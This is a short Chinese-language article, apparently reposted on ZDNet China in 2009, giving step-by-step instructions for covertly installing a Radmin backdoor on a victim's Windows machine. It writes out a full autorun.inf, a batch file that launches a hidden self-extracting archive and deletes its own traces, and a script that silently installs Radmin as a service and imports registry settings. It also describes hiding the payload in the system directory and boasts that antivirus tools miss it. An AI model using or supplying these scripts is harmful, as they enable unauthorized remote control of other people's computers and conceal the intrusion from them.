黑客绝技入侵网站全自动安装后门分析

ZDNet软件频道 时间:2009-11-06 作者: | 中国IT实验室 我要评论()
本文关键词:网站安全 入侵 黑客 Windows
运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理,会在最后把所有文件删除。此时,后门却已经装上去了 《此法针对没有权限运行木马的入侵活动》

  1.autorun.inf 2.shell.bat 3.hao.exe(自解压文件)

  思路:全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件。

  第一文件带动运行第二文件。同时第二运行第三

  运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理,会在最后把所有文件删除。此时,后门却已经装上去了 《此法针对没有权限运行木马的入侵活动》

  制作:

  [autorun]

  open=shell.bat

  这个是autorun.inf

  @echo off

  hao.exe

  c:Windowsexplorer c:

  del autorun.inf

  del rad.exe

  del shell.bat

  这个是shell.bat

  hao.exe 里面包含admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件《关键所在》

  r.bat--》批处理做法

  @echo off

  @pchealthy.exe /install /silence

  @regedit /s admin.reg

  @net start r_server

  @del admin.reg

  @del r.bat

  其他四个就是Radmin的文件。这个大家都会,复制过来就行

  OK,我们再来看自解压的处理,在解压路径里我们用%systemroot%system32,就是解压到系统目录里,并且 “解压后运行”填上我们的r.bat文件!!!!!!

  因为这里的文件比较多,比较隐蔽

  解压模式我们选 “全部隐藏”,和 “覆盖所有文件”!

  好了,一个不被杀毒软件所能查杀的好后门程序就成功制作出来了!

  大家不要放在文件夹里压缩哦,要直接选上admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件压缩

  哈哈。。这样就行啦。

  网站你也可以破《这篇文章总结了一些高手和自己的经验》

  写的不好别见怪。。。---》菜鸟要是能灵活运用这个也很厉害啦

  当然这个方法有一些局限性

网站安全

入侵

黑客

Windows


百度大联盟认证黄金会员Copyright© 1997- CNET Networks 版权所有。 ZDNet 是CNET Networks公司注册服务商标。
中华人民共和国电信与信息服务业务经营许可证编号:京ICP证010391号 京ICP备09041801号-159
京公网安备:1101082134